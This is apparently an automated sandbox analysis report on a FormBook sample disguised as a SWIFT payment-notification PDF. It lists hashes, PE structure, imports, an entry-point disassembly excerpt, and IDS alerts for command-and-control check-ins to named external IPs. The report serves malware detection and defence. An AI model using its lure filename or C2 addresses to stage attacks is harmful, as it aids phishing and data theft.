                                                                                                                            Process:C:\Windows\SysWOW64\DevicePairingWizard.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):135168
                                                                                                                            Entropy (8bit):1.1142956103012707
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                            MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                            SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                            SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                            SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288768
                                                                                                                            Entropy (8bit):7.993605473546579
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:AL5RYGU/ftTE5MgXnYQv32UtAWZwilTlM8PenU2tuE+lUJQju:SAtwn9v3POZwJ/PoduEUUJT
                                                                                                                            MD5:98557C3094525C0F2AFA6BDE0897E724
                                                                                                                            SHA1:76EBCEDF4C7B3A07205DD2CC7C21BE88D29575E1
                                                                                                                            SHA-256:C95A780F71F323D6E47BF294052D0078E8F8F9CB4669274230B5231F81B24F4A
                                                                                                                            SHA-512:497CF3874F3D5B4E14EB09EADD427893F872CD5CC01A77869D8B550B4545AD9D0AD5ACC8907C478D1AA83CBBF2B4015BDE7C41D9249E38F4C08B3A76635D2A60
                                                                                                                            Malicious:false
                                                                                                                            Preview:..re.L3YK.._....2O..qBF...QN772L3YKYANVPXQN772L3YKYANVPX.N77<S.WK.H.w.Y...cZ%@y;+.)$15q-VY\#Gy)<a<#>x8 .s}..4$=$`[]RuN772L3Y2XH.k0?.sWP.qS>.C..j86.-....9,.[...d1).e[/[d+>.NVPXQN77b.3Y.X@N+$..N772L3YK.ALW[YZN7a6L3YKYANVP(CN77"L3Y;]ANV.XQ^772N3YMYANVPXQH772L3YKY1JVPZQN772L1Y..ANFPXAN772\3Y[YANVPXAN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANx$=):772.f]KYQNVP.UN7'2L3YKYANVPXQN7.2LSYKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKY
                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Entropy (8bit):7.213665561092086
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                            File size:966'221 bytes
                                                                                                                            MD5:fbc1b3a9567b4153601f2f845ecfedf2
                                                                                                                            SHA1:c64a2e0ad636233b7f55fd0cb95e3a175d6170c0
                                                                                                                            SHA256:214e00b6e262b442940ca666466022947d103e15837ed50723e6b6ea7d7279dc
                                                                                                                            SHA512:ebc39eb92150a1d43d0f7c448802c4c97829feebf1dd150b585095aae45967b8eeed85da52202b25aa43b9d94462fb313caf394aa38effb9c37e6da0fb62f4c0
                                                                                                                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCZS90tO3KdSKMWfoOsHAz5:7JZoQrbTFZY1iaCS0TMWfolU
                                                                                                                            TLSH:6725C022F5C59036C2B323B19E7EF76A963D69360326D2DB33C82D355EA05416B29733
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                            Icon Hash:1733312925935517
                                                                                                                            Entrypoint:0x4165c1
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:5
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:5
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:5
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                            Instruction
                                                                                                                            call 00007F6A8897D6EBh
                                                                                                                            jmp 00007F6A8897455Eh
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            push edi
                                                                                                                            push esi
                                                                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                                                                            mov ecx, dword ptr [ebp+10h]
                                                                                                                            mov edi, dword ptr [ebp+08h]
                                                                                                                            mov eax, ecx
                                                                                                                            mov edx, ecx
                                                                                                                            add eax, esi
                                                                                                                            cmp edi, esi
                                                                                                                            jbe 00007F6A889746DAh
                                                                                                                            cmp edi, eax
                                                                                                                            jc 00007F6A88974876h
                                                                                                                            cmp ecx, 00000080h
                                                                                                                            jc 00007F6A889746EEh
                                                                                                                            cmp dword ptr [004A9724h], 00000000h
                                                                                                                            je 00007F6A889746E5h
                                                                                                                            push edi
                                                                                                                            push esi
                                                                                                                            and edi, 0Fh
                                                                                                                            and esi, 0Fh
                                                                                                                            cmp edi, esi
                                                                                                                            pop esi
                                                                                                                            pop edi
                                                                                                                            jne 00007F6A889746D7h
                                                                                                                            jmp 00007F6A88974AB2h
                                                                                                                            test edi, 00000003h
                                                                                                                            jne 00007F6A889746E6h
                                                                                                                            shr ecx, 02h
                                                                                                                            and edx, 03h
                                                                                                                            cmp ecx, 08h
                                                                                                                            jc 00007F6A889746FBh
                                                                                                                            rep movsd
                                                                                                                            jmp dword ptr [00416740h+edx*4]
                                                                                                                            mov eax, edi
                                                                                                                            mov edx, 00000003h
                                                                                                                            sub ecx, 04h
                                                                                                                            jc 00007F6A889746DEh
                                                                                                                            and eax, 03h
                                                                                                                            add ecx, eax
                                                                                                                            jmp dword ptr [00416654h+eax*4]
                                                                                                                            jmp dword ptr [00416750h+ecx*4]
                                                                                                                            nop
                                                                                                                            jmp dword ptr [004166D4h+ecx*4]
                                                                                                                            nop
                                                                                                                            inc cx
                                                                                                                            add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                            inc cx
                                                                                                                            add byte ptr [ebx], ah
                                                                                                                            ror dword ptr [edx-75F877FAh], 1
                                                                                                                            inc esi
                                                                                                                            add dword ptr [eax+468A0147h], ecx
                                                                                                                            add al, cl
                                                                                                                            jmp 00007F6A8ADECED7h
                                                                                                                            add esi, 03h
                                                                                                                            add edi, 03h
                                                                                                                            cmp ecx, 08h
                                                                                                                            jc 00007F6A8897469Eh
                                                                                                                            rep movsd
                                                                                                                            jmp dword ptr [00000000h+edx*4]
                                                                                                                            Programming Language:
                                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                                            • [C++] VS2010 SP1 build 40219
                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                            • [ASM] VS2010 SP1 build 40219
                                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                                            • [LNK] VS2010 SP1 build 40219
                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                            RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                            RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                            RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                            RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                            RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                            RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                            RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                            RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                            RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                            RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                            RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                            RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                            RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                            RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                            RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                            RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                            RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                            RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                            RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                            RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                            RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                            RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                            RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                            RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                            RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                            RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                                                            DLLImport
                                                                                                                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                            USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                            GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                            OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishGreat Britain
                                                                                                                            EnglishUnited States
                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978984.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049732208.91.197.2780TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204972884.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049733208.91.197.2780TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975284.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204973084.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049734208.91.197.2780TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979184.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049793208.91.197.2780TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975484.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975384.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976213.248.169.4880TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979084.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204972984.32.84.3280TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980313.248.169.4880TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497703.33.130.19080TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974213.248.169.4880TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049795208.91.197.2780TCP
                                                                                                                            2024-11-12T15:28:33.384396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049794208.91.197.2780TCP
                                                                                                                            2024-11-12T15:29:49.793779+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049719206.119.81.12180TCP
                                                                                                                            2024-11-12T15:30:06.488831+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204972047.52.221.880TCP
                                                                                                                            2024-11-12T15:30:09.348521+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204972147.52.221.880TCP
                                                                                                                            2024-11-12T15:30:12.210301+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204972247.52.221.880TCP
                                                                                                                            2024-11-12T15:30:15.088783+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204972347.52.221.880TCP
                                                                                                                            2024-11-12T15:30:21.474308+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049724154.38.64.680TCP
                                                                                                                            2024-11-12T15:30:24.331656+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049725154.38.64.680TCP
                                                                                                                            2024-11-12T15:30:27.179439+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049726154.38.64.680TCP
                                                                                                                            2024-11-12T15:30:30.042700+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049727154.38.64.680TCP
                                                                                                                            2024-11-12T15:30:44.048299+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204973184.32.84.3280TCP
                                                                                                                            2024-11-12T15:30:58.706921+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049735208.91.197.2780TCP
                                                                                                                            2024-11-12T15:31:04.558226+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049736203.161.49.19380TCP
                                                                                                                            2024-11-12T15:31:07.284661+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049737203.161.49.19380TCP
